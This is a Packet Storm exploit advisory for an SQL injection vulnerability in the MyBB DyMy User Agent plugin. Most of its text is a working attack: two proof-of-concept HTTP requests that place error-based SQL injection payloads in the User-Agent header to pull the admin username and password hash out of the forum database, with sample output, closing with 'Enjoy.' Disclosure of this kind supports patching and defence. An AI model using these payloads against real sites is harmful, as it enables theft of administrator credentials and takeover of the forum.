MyBB DyMy User Agent plugin suffers from a remote SQL injection vulnerability.
a8a2eb2944aa5dcefd861c252a254b4563f92ce0c1586963e669bcfbf992580d############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en #
# Date : 13 Dec 2012 #
# Tested on : Linux #
# Category : Web Applications #
# Software Link : http://mods.mybb.com/view/dymy-user-agent #
############################################################################
[*] PoC (receive admin username)
We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
We then replace our user agent with the following Query:
POST http://localhost/mybb/newreply.php?ajax=1
HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #
Output:
SQL Error:
1062 - Duplicate entry 'admin1' for key 'group_key'
+------------------------------------------------------------------+
[*] PoC (receive admin password)
We then replace our user agent with the following Query:
POST http://localhost/mybb/newreply.php?ajax=1
HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #
Output:
SQL Error:
1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'
+------------------------------------------------------------------+
Enjoy.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed